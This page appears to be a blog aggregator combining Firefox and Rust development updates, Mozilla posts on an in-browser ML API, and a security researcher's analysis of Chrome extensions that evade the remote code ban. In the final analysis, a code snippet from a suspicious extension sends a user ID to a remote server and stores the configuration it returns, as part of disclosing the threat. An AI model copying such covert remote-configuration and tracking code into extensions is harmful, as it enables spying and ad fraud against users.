Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox NightlyNew Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extensions added to the MDN webextensions examples repo is being worked on in the following github pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view. It is showing a warning: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust."The WebExtension permission request dialog in the Firefox Desktop when installing or updating an extension is shown. It is showing a warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpg” and a quality ranging between 0 and 1 (#1861737)
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow to debug crashes more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preferences, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button in Bug 1921060 – Implement the full mute button spec
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

  • We added a new way to filter the profile to only include the data that is related to the tab you would like to see, by adding tab selector. You can see this by clicking the “Full Profile” button on the top left corner. This allows web and gecko developers to only focus on a certain website.
    • A dropdown selector is shown above the tracks in the Firefox Profiler UI. The dropdown lists "All tabs and windows" and then "browser", followed by a list of individual domains. like "www.mozilla.org" and "www.google.com".
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language as well as the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing ctrl+shift+tab while the Unified Search Button was enabled and the address bar is focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and pressing shift tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke enabled the keyboard focus of the Unified Search Button using Shift + Tab after focus using CTRL + L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL instead of initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application provided search engine WebExtensions from a users profile as they no longer require them due to the usage of search-config-v2 Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new  –table-row-background-color and –table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N)L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

 

These work great in the sidebar and vertical tabs feature that was released in the Firefox Labs feature in Nightly 131!

New profile selector

The new profile selector which we have been localizing over the previous months is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail and we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end of year presentation on Pontoon! A Youtube link and AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox NightlyFirefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file, and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under the hood change to them, and switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, all the way back in 2015. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it prior to then.

But that still begs the question: why wait ~18 months later to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a 3rd party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation experience, you should see absolutely no changes to the Firefox installation experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the Javascript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons BlogAnnouncing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogDecember Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Stable support for async closures landed on nightly on Dec 12 and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation but it has not yet reached stable. This will be done as part of our 2025H1 goal.
  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not consided dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate dynosaur1 that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
  • Work was done to prototype an implementation for async drop but we didn't account for reviewing bandwidth. nikomatsakis has done initial reads and is working with PR author to get this done in 2025H1. To be clear though the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don't even have an RFC, and there are lots of unknowns remaining).
  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus, that's on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementaton was revealing unstable details, which is currently being resolved;
  • asm_goto stabilization PR and reference updates are up, excluding the "output" feature.
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilisation

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface for our representation of const arguments in the type system layer, there is no longer a way to evaluate a const argument without going through our general purpose type system logic. This was necessary to ensure that we correctly handle equality of the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request adding example searches and adding a search button has been added to the agenda for the rustdoc team next meeting.
  • The -Znext-solver=coherence stabilization is now stable in version 1.84, with a new update blogpost published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was "we want to see the whole picture". Next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on my own writing bandwidth (reach out if you want to help!). Work will continue but the goal won't be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • RFC is done, waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged with only one remaining until a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Will start work on batching feature of LLVM/Enzyme which allows Array of Struct and Struct of Array vectorisation.
  • There's been a push to add a AMD GPU target to the compiler which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

  1. As everyone knows, the hardest part of computer-science is naming. I think we rocked this one.

The Mozilla BlogRunning inference in web extensions

Image generated by DALL*E using the following prompt: A person standing on a platform in the ocean, surrounded by big waves. They are holding a sail with a big Firefox logo on it. Make it like Hokusai’s The Great Wave off Kanagawa print and make sure the boat looks like it can actually stay afloat

Image generated by DALL*E

We’re shipping a new API in Firefox Nightly that will let you use our Firefox AI runtime to run offline machine learning tasks in your web extension.

Firefox AI Runtime

We’ve recently shipped a new component inside of Firefox that leverages Transformers.js (a JavaScript equivalent of Hugging Face’s Transformers Python library) and the underlying ONNX runtime engine. This component lets you run any machine learning model that is compatible with Transformers.js in the browser, with no server-side calls beyond the initial download of the models. This means Firefox can run everything on your device and avoid sending your data to third parties.

Web applications can already use Transformers.js in vanilla JavaScript, but running through our platform offers some key benefits:

  • The inference runtime is executed in a dedicated, isolated process, for safety and robustness
  • Model files are stored using IndexedDB and shared across origins
  • Firefox-specific performance improvements are done to accelerate the runtime

This platform shipped in Firefox 133 to provide alt text for images in PDF.js, and will be used in several other places in Firefox 134 and beyond to improve the user experience.

We also want to unblock the community’s ability to experiment with these capabilities. Starting later today, developers will be able to access a new trial “ml” API in Firefox Nightly. This API is basically a thin wrapper around Firefox’s internal API, but with a few additional restrictions for user privacy and security.

There are two major differences between this API and most other WebExtensions APIs: the API is highly experimental and permission to use it must be requested after installation.

This new API is virtually guaranteed to change in the future. To help set developer expectations, the “ml” API is exposed under the “browser.trial” namespace rather than directly on the “browser” global object. Any API exposed on “browser.trial” may not be compatible across major versions of Firefox. Developers should guard against breaking changes using a combination of feature detection and strict_min_version declarations. You can see a more detailed description of how to write extensions with it in our documentation.

Running an inference task

Performing inference directly in the browser is quite exciting. We expect people will be able to build compelling features using the browser’s data locally.

Like the original Transformers that inspired it, Transformers.js uses “tasks” to abstract away implementation details for performing specific kinds of ML workloads. You can find a description of all tasks that Transformers.js supports in the project’s official documentation.

For our first iteration, Firefox exposes  the following tasks:

  • text-classification – Assigning a label or class to a given text
  • token-classification – Assigning a label to each token in a text
  • question-answering – Retrieve the answer to a question from a given text
  • fill-mask –  Masking some of the words in a sentence and predicting which words should replace those masks
  • summarization – Producing a shorter version of a document while preserving its important information.
  • translation – Converting text from one language to another
  • text2text-generation – converting one text sequence into another text sequence
  • text-generation – Producing new text by predicting the next word in a sequence
  • zero-shot-classification – Classifying text into classes that are unseen during training
  • image-to-text – Output text from a given image
  • image-classification – Assigning a label or class to an entire image
  • image-segmentation – Divides an image into segments where each pixel is mapped to an object 
  • zero-shot-image-classification – Classifying images into classes that are unseen during training
  • object-detection – Identify objects of certain defined classes within an image
  • zero-shot-object-detection – Identify objects of classes that are unseen during training
  • document-question-answering – Answering questions on document image
  • image-to-image – Transforming a source image to match the characteristics of a target image or a target image domain
  • depth-estimation – Predicting the depth of objects present in an image
  • feature-extraction – Transforming raw data into numerical features that can be processed while preserving the information in the original dataset
  • image-feature-extraction – Transforming raw data into numerical features that can be processed while preserving the information in the original image

For each task, we’ve selected a default model. See the list here EngineProcess.sys.mjs – mozsearch. These curated models are all stored in our Model Hub at https://model-hub.mozilla.org/. A Model Hub is how Hugging Face defines an online storage of models, see The Model Hub. Whether used by Firefox itself or an extension, models are automatically downloaded on the first use and cached.

Below is example below showing how to run a summarizer in your extension with the default model:

async function summarize(text) {
  await browser.trial.ml.createEngine({taskName: "summarization"});
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

If you want to use another model, you can use any model published on Hugging Face by Xenova or the Mozilla organization. For now, we’ve restricted downloading models from those two organizations, but we might relax this limitation in the future.

To use an allow-listed model from Hugging Face, you can use an options object to set the “modelHub” option to “huggingface”  and the “taskName” option to the appropriate task when creating an engine.

Let’s modify the previous example to use a model that can summarize larger texts:

async function summarize(text) {
  await browser.trial.ml.createEngine({
    taskName: "summarization", 
    modelHub: "huggingface", 
    modelId: "Xenova/long-t5-tglobal-base-16384-book-summary"
   });
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

Our PDF.js alt text feature follows the same pattern:

  • Gets the image to describe
  • Use the “image-to-text” task with the “mozilla/distilvit” model
  • Run the inference and return the generated text

This feature is built directly into Firefox, but we’ve also made a web extension example out of it, that you can find in our source code and use as a basis to build your own. See https://searchfox.org/mozilla-central/source/toolkit/components/ml/docs/extensions-api-example. For instance, it includes some code to request the relevant permission, and a model download progress bar.

We’d love to hear from you

This API is our first attempt to enable the community to build on the top of our Firefox AI Runtime. We want to make this API as simple and powerful as possible.

We believe that offering this feature to web extensions developers will help us learn and understand if and how such an API could be developed as a web standard in the future.

We’d love to hear from you and see what you are building with this.

Come and say hi in our dedicated Mozilla AI discord #firefox-ai. Discord invitation: https://discord.gg/Jmmq9mGwy7

Last but not least, we’re doing a deep dive talk at the FOSDEM in the Mozilla room Sunday February 2nd in Brussels. There will be many interesting talks in that room, see: https://fosdem.org/2025/schedule/track/mozilla/

The post Running inference in web extensions appeared first on The Mozilla Blog.

The Mozilla BlogSupercharge your day: Firefox features for peak productivity

Illustration of a browser interface with five large icons: a pin, magnifying glass, sparkles, an "X," and a menu, set against a gradient orange and yellow background with playful shapes like lightning bolts and stars.

Hi, I’m Tapan. As the leader of Firefox’s Search and AI efforts, my mission is to help users find what they are looking for on the web and stay focused on what truly matters. Outside of work, I indulge my geek side by building giant Star Wars Lego sets and sharing weekly leadership insights through my blog, Building Blocks. These hobbies keep me grounded and inspired as I tackle the ever-evolving challenges of the digital world.

I’ve always been fascinated by the internet — its infinite possibilities, endless rabbit holes and the wealth of knowledge just a click away. But staying focused online can feel impossible. I spend my days solving user problems, crafting strategies, and building products that empower people to navigate the web more effectively. Yet, even I am not immune to the pull of distraction. Let me paint you a picture of my daily online life. It’s a scene many of you might recognize: dozens of tabs open, notifications popping up from every corner, and a long to-do list staring at me. In this chaos, I’ve learned that staying focused requires intention and the right tools.

Over the years, I have discovered several Firefox features that are absolute game-changers for staying productive online:

1. Pinned Tabs: Anchor your essentials

Pinned Tabs get me to my most essential tabs in one click. I have a few persistent pinned tabs — my email, calendar, and files — and a few “daily” pinned tabs — my “must-dos” of the day tabs. This is my secret weapon for keeping my workspace organized. Pinned Tabs stay put and don’t clutter my tab bar, making it easy to switch between key resources without hunting my tab list.

To pin a tab, right-click it and select “Pin Tab.” Now, your essential tabs will always be at your fingertips.

2. Search: Use the fast lane

The “@” shortcut is my productivity superpower, taking me to search results in a flash. By typing “@amazon,” “@bing,” or “@history” followed by your search terms, you can instantly search those platforms or your browsing history without leaving your current page. This saves me time by letting me jump right to search results.

In the next Firefox update, we are making the search term persistent in the address bar so that you can use the address bar to refine your searches for supported sites.

To search supported sites, type “@” in the address bar and pick any engine from the supported list.

3. AI-powered summarization: Cut to the chase

This is one of my favorite recent additions to Firefox. Our AI summarization feature can distill long articles or documents into concise summaries, helping you grasp the key points without wading through endless text. Recently, I used Firefox’s AI summarization to condense sections of research papers on AI. This helped me quickly grasp the key findings and apply them to our strategy discussions for enhancing Firefox’s AI features. Using AI to help build AI!

To use AI-powered summarization, type “about:preferences#experimental” in the address bar and enable “AI chatbot.” Pick your favorite chatbot and sign in. Select any text on a page you wish to summarize and right-click to pick “Ask <your chatbot>.” We are adding new capabilities to this list with every release.

4. Close Duplicate Tabs: Declutter your workspace

If you are like me, you’ve probably opened the same webpage multiple times without realizing it. Firefox’s “Close Duplicate Tabs” feature eliminates this problem.

By clicking the tab list icon  at the top-right corner of the Firefox window, you can detect and close duplicate tabs, keeping your workspace clean and reducing mental load. This small but mighty tool is for anyone prone to tab overload.

5. Reader View: Eliminate distractions

Reader View transforms cluttered web pages into clean, distraction-free layouts. You can focus entirely on the content by stripping away ads, pop-ups, and other distractions. Whether reading an article or researching, this feature keeps your mind on the task.

To enable it, click the Reader View icon in the address bar when viewing a page.

These Firefox features have transformed how I navigate the web, helping me stay focused, productive, and in control of my time online. Whether managing a complex task, diving into research, or just trying to stay on top of your daily tasks, these tools can help you take charge of your browsing experience.

What are your favorite Firefox productivity tips? I would love to hear how you customize Firefox to fit your life.

Let’s make the web work for us!

Get Firefox

Get the browser that protects what’s important

The post Supercharge your day: Firefox features for peak productivity appeared first on The Mozilla Blog.

Wladimir PalantMalicious extensions circumvent Google’s remote code ban

As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in form of a policy but rather a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension's own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
